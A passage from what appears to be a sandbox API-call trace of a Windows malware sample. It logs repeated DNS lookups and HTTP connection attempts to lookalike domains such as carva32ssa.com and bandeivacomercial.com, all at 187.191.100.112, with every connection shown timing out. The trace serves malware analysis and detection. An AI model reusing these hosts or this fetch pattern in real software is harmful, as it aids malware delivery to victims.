lpMultiByteStr=0x635178c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7 [0292.355] GetProcAddress (hModule=0x75fd0000, lpProcName="connect") returned 0x75fd6bdd [0292.355] connect (s=0x9e0, name=0x534f4b0*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0313.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0313.413] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x634a3dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15 [0313.414] GetProcAddress (hModule=0x75fd0000, lpProcName="WSAGetLastError") returned 0x75fd37ad [0313.414] WSAGetLastError () returned 10060 [0313.414] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeaa, lpBuffer=0x534d3dc, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0313.414] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeca, lpBuffer=0x534d3d8, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0313.414] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x534f440) [0313.414] RtlUnwind (TargetFrame=0x534f58c, TargetIp=0x5fc8130, ExceptionRecord=0x534ef6c, ReturnValue=0x0) [0313.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0313.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="shutdown", cchWideChar=8, lpMultiByteStr=0x634a51c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shutdown", lpUsedDefaultChar=0x0) returned 8 [0313.415] GetProcAddress (hModule=0x75fd0000, lpProcName="shutdown") returned 0x75fd449d [0313.415] shutdown (s=0x9e0, how=1) returned -1 [0313.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0313.415] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x634a51c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11 [0313.416] GetProcAddress (hModule=0x75fd0000, lpProcName="closesocket") returned 0x75fd3918 [0313.416] closesocket (s=0x9e0) returned 0 [0313.416] GetCurrentThreadId () returned 0x62c [0313.416] GetCurrentThreadId () returned 0x62c [0313.416] GetCurrentThreadId () returned 0x62c [0313.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534ecc5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="í4\x05 1k\x05lí4\x05\"ú»wòp»wèù»wø°÷r\x1c¥4\x06", lpUsedDefaultChar=0x0) returned 0 [0313.416] GetCurrentThreadId () returned 0x62c [0313.416] GetCurrentThreadId () returned 0x62c [0313.416] GetCurrentThreadId () returned 0x62c [0313.418] RtlUnwind (TargetFrame=0x534f708, TargetIp=0x5fc8130, ExceptionRecord=0x534ef6c, ReturnValue=0x0) [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="carva32ssa.com", cchCount2=14) returned 3 [0313.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0313.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534eb7d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0313.421] socket (af=2, type=1, protocol=0) returned 0x9e0 [0313.422] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534ec44, optlen=0x534ec40 | out: optval="\x01", optlen=0x534ec40) returned 0 [0313.422] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534ec44, optlen=0x534ec40 | out: optval="", optlen=0x534ec40) returned 0 [0313.422] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0313.422] htons (hostshort=0x0) returned 0x0 [0313.422] bind (s=0x9e0, addr=0x534eba4*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0313.422] getsockname (in: s=0x9e0, name=0x534eb98, namelen=0x534ec18 | out: name=0x534eb98*(sa_family=2, sin_port=0xc007, sin_addr="0.0.0.0"), namelen=0x534ec18) returned 0 [0313.422] htons (hostshort=0x7c0) returned 0xc007 [0313.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="LOCALHOST", cchCount2=9) returned 1 [0313.422] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 14 [0313.422] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x6366edc, cchASCIIChar=14 | out: lpASCIICharStr="carva32ssa.com") returned 14 [0313.422] GetAddrInfoW (in: pNodeName="carva32ssa.com", pServiceName=0x0, pHints=0x534ec4c, ppResult=0x534ec6c | out: ppResult=0x534ec6c) returned 0 [0314.431] FreeAddrInfoW (pAddrInfo=0x56e55e8) [0314.431] htons (hostshort=0x50) returned 0x5000 [0314.431] connect (s=0x9e0, name=0x534ebfc*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0335.456] WSAGetLastError () returned 10060 [0335.456] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeaa, lpBuffer=0x534cb28, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0335.456] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeca, lpBuffer=0x534cb24, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0335.457] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x534eb8c) [0335.457] RtlUnwind (TargetFrame=0x534ecd8, TargetIp=0x5fc8130, ExceptionRecord=0x534e6ac, ReturnValue=0x0) [0335.458] shutdown (s=0x9e0, how=1) returned -1 [0335.458] closesocket (s=0x9e0) returned 0 [0335.459] GetCurrentThreadId () returned 0x62c [0335.459] GetCurrentThreadId () returned 0x62c [0335.459] GetCurrentThreadId () returned 0x62c [0335.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534e405, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0335.459] GetCurrentThreadId () returned 0x62c [0335.459] GetCurrentThreadId () returned 0x62c [0335.459] GetCurrentThreadId () returned 0x62c [0335.462] RtlUnwind (TargetFrame=0x534ee54, TargetIp=0x5fc8130, ExceptionRecord=0x534e6ac, ReturnValue=0x0) [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0335.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0335.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0335.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0335.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="bandeivacomercial.com", cchCount2=21) returned 3 [0335.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0335.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534e2bd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0335.467] socket (af=2, type=1, protocol=0) returned 0x9e0 [0335.468] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534e384, optlen=0x534e380 | out: optval="\x01", optlen=0x534e380) returned 0 [0335.468] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534e384, optlen=0x534e380 | out: optval="", optlen=0x534e380) returned 0 [0335.468] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0335.468] htons (hostshort=0x0) returned 0x0 [0335.468] bind (s=0x9e0, addr=0x534e2e4*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0335.468] getsockname (in: s=0x9e0, name=0x534e2d8, namelen=0x534e358 | out: name=0x534e2d8*(sa_family=2, sin_port=0xc008, sin_addr="0.0.0.0"), namelen=0x534e358) returned 0 [0335.468] htons (hostshort=0x8c0) returned 0xc008 [0335.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="LOCALHOST", cchCount2=9) returned 1 [0335.468] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 21 [0335.469] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x6391e7c, cchASCIIChar=21 | out: lpASCIICharStr="bandeivacomercial.com") returned 21 [0335.469] GetAddrInfoW (in: pNodeName="bandeivacomercial.com", pServiceName=0x0, pHints=0x534e38c, ppResult=0x534e3ac | out: ppResult=0x534e3ac) returned 0 [0335.495] FreeAddrInfoW (pAddrInfo=0x5718ef8) [0335.495] htons (hostshort=0x50) returned 0x5000 [0335.495] connect (s=0x9e0, name=0x534e33c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0356.547] WSAGetLastError () returned 10060 [0356.547] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeaa, lpBuffer=0x534c268, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0356.547] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeca, lpBuffer=0x534c264, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0356.548] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x534e2cc) [0356.548] RtlUnwind (TargetFrame=0x534e418, TargetIp=0x5fc8130, ExceptionRecord=0x534ddec, ReturnValue=0x0) [0356.549] shutdown (s=0x9e0, how=1) returned -1 [0356.549] closesocket (s=0x9e0) returned 0 [0356.549] GetCurrentThreadId () returned 0x62c [0356.549] GetCurrentThreadId () returned 0x62c [0356.549] GetCurrentThreadId () returned 0x62c [0356.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534db45, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0356.550] GetCurrentThreadId () returned 0x62c [0356.550] GetCurrentThreadId () returned 0x62c [0356.550] GetCurrentThreadId () returned 0x62c [0356.551] RtlUnwind (TargetFrame=0x534e594, TargetIp=0x5fc8130, ExceptionRecord=0x534ddec, ReturnValue=0x0) [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0356.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0356.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="bandeivacomercio.com", cchCount2=20) returned 1 [0356.556] CompareStringW (Locale=0x400, 